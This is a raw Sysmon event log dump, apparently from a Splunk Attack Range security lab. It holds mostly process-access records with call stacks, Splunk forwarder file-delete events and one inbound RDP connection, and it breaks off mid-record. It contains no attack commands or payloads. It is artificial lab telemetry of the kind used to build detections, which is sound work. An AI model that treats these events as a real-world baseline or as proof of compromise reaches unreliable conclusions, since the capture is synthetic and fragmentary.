09:17:29.055{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980011Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.055{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980010Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.040{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980009Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.040{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980008Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.040{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8C29-6151-EF79-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980007Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.040{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C29-6151-EF79-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980006Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.041{69CF5F33-8C29-6151-EF79-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051599Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.977{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c0467b|C:\Program Files\Mozilla Firefox\xul.dll+bfd432|C:\Program Files\Mozilla Firefox\xul.dll+c02a70|C:\Program Files\Mozilla Firefox\xul.dll+c031cb|C:\Program Files\Mozilla Firefox\xul.dll+396c71|C:\Program Files\Mozilla Firefox\xul.dll+c03f99|C:\Program Files\Mozilla Firefox\xul.dll+c06f52|C:\Program Files\Mozilla Firefox\xul.dll+c039b6|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+c069c8|C:\Program Files\Mozilla Firefox\xul.dll+c06d2d 10341000x80000000000000001051598Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.977{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+27c3fa8|C:\Program Files\Mozilla Firefox\xul.dll+27b52ec|C:\Program Files\Mozilla Firefox\xul.dll+bfe491|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9 10341000x80000000000000001051597Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.976{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c04bf0|C:\Program Files\Mozilla Firefox\xul.dll+27c138b|C:\Program Files\Mozilla Firefox\xul.dll+27b4476|C:\Program Files\Mozilla Firefox\xul.dll+bfe10a|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32 10341000x80000000000000001051596Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.976{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c0467b|C:\Program Files\Mozilla Firefox\xul.dll+bfd432|C:\Program Files\Mozilla Firefox\xul.dll+c02a70|C:\Program Files\Mozilla Firefox\xul.dll+c031cb|C:\Program Files\Mozilla Firefox\xul.dll+396c71|C:\Program Files\Mozilla Firefox\xul.dll+c03f99|C:\Program Files\Mozilla Firefox\xul.dll+c06f52|C:\Program Files\Mozilla Firefox\xul.dll+c039b6|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+c069c8|C:\Program Files\Mozilla Firefox\xul.dll+c06d2d 10341000x80000000000000001051595Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.951{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051594Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.951{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051593Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.951{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051592Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.951{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051591Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.647{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0ED12F942511BC02E401A302ABDC7ED,SHA256=29B9E63B2CD0944C9E8B61E164B9CA6C76255D92AF4F94943E810A976A8A149C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980023Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:30.555{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DEFEBE0A8D98D9BD0F84430328B24D8,SHA256=2394A46A4DCD57C5251BFED438AFD47435EDA20E5CD92DF049FD7801C7B93A18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980022Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:30.274{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34CFABB097564C577172653071EF3D1E,SHA256=6D3E9DAEBB518325E22695E63615D7AD59503AB88FFAE6E36A3E5594680174E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051590Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.427{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+ec7f3e|C:\Program Files\Mozilla Firefox\xul.dll+2870d2|C:\Program Files\Mozilla Firefox\xul.dll+2863bf|C:\Program Files\Mozilla Firefox\xul.dll+2861aa|C:\Program Files\Mozilla Firefox\xul.dll+ee10a5|C:\Program Files\Mozilla Firefox\xul.dll+18ab07a|C:\Program Files\Mozilla Firefox\xul.dll+1ac1848|C:\Program Files\Mozilla Firefox\xul.dll+1ac3db2|C:\Program Files\Mozilla Firefox\xul.dll+176a76e|C:\Program Files\Mozilla Firefox\xul.dll+d16064|C:\Program Files\Mozilla Firefox\xul.dll+f1b028|C:\Program Files\Mozilla Firefox\xul.dll+f1927f|C:\Program Files\Mozilla Firefox\xul.dll+f1a8e4|C:\Program Files\Mozilla Firefox\xul.dll+d32a01|C:\Program Files\Mozilla Firefox\xul.dll+f1a368|C:\Program Files\Mozilla Firefox\xul.dll+f18265|C:\Program Files\Mozilla Firefox\xul.dll+f175ec|C:\Program Files\Mozilla Firefox\xul.dll+f17191|C:\Program Files\Mozilla Firefox\xul.dll+12d092|C:\Program Files\Mozilla Firefox\xul.dll+ea75a2|C:\Program Files\Mozilla Firefox\xul.dll+ee1af3 10341000x80000000000000001051589Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.427{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+ec7f17|C:\Program Files\Mozilla Firefox\xul.dll+2870d2|C:\Program Files\Mozilla Firefox\xul.dll+2863bf|C:\Program Files\Mozilla Firefox\xul.dll+2861aa|C:\Program Files\Mozilla Firefox\xul.dll+ee10a5|C:\Program Files\Mozilla Firefox\xul.dll+18ab07a|C:\Program Files\Mozilla Firefox\xul.dll+1ac1848|C:\Program Files\Mozilla Firefox\xul.dll+1ac3db2|C:\Program Files\Mozilla Firefox\xul.dll+176a76e|C:\Program Files\Mozilla Firefox\xul.dll+d16064|C:\Program Files\Mozilla Firefox\xul.dll+f1b028|C:\Program Files\Mozilla Firefox\xul.dll+f1927f|C:\Program Files\Mozilla Firefox\xul.dll+f1a8e4|C:\Program Files\Mozilla Firefox\xul.dll+d32a01|C:\Program Files\Mozilla Firefox\xul.dll+f1a368|C:\Program Files\Mozilla Firefox\xul.dll+f18265|C:\Program Files\Mozilla Firefox\xul.dll+f175ec|C:\Program Files\Mozilla Firefox\xul.dll+f17191|C:\Program Files\Mozilla Firefox\xul.dll+12d092|C:\Program Files\Mozilla Firefox\xul.dll+ea75a2|C:\Program Files\Mozilla Firefox\xul.dll+ee1af3 10341000x80000000000000001051588Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.427{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+ec7eec|C:\Program Files\Mozilla Firefox\xul.dll+2870d2|C:\Program Files\Mozilla Firefox\xul.dll+2863bf|C:\Program Files\Mozilla Firefox\xul.dll+2861aa|C:\Program Files\Mozilla Firefox\xul.dll+ee10a5|C:\Program Files\Mozilla Firefox\xul.dll+18ab07a|C:\Program Files\Mozilla Firefox\xul.dll+1ac1848|C:\Program Files\Mozilla Firefox\xul.dll+1ac3db2|C:\Program Files\Mozilla Firefox\xul.dll+176a76e|C:\Program Files\Mozilla Firefox\xul.dll+d16064|C:\Program Files\Mozilla Firefox\xul.dll+f1b028|C:\Program Files\Mozilla Firefox\xul.dll+f1927f|C:\Program Files\Mozilla Firefox\xul.dll+f1a8e4|C:\Program Files\Mozilla Firefox\xul.dll+d32a01|C:\Program Files\Mozilla Firefox\xul.dll+f1a368|C:\Program Files\Mozilla Firefox\xul.dll+f18265|C:\Program Files\Mozilla Firefox\xul.dll+f175ec|C:\Program Files\Mozilla Firefox\xul.dll+f17191|C:\Program Files\Mozilla Firefox\xul.dll+12d092|C:\Program Files\Mozilla Firefox\xul.dll+ea75a2|C:\Program Files\Mozilla Firefox\xul.dll+ee1af3 23542300x8000000000000000980025Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:31.509{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D28B16CD1B3417499DF2AFB7319697E6,SHA256=FB370C5D221C5AFE6B238A59647A8CE308A76BD0B1A1E115B62C03B552829187,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051600Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:31.660{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16A3C0B473C9EB4578673A1F0E2EA431,SHA256=A2575E6CD1F05E6A04E508FD5F8A5A9A9C03D945EACCE340FC0A340B499B01AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980024Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.886{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59796-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980027Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:32.743{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 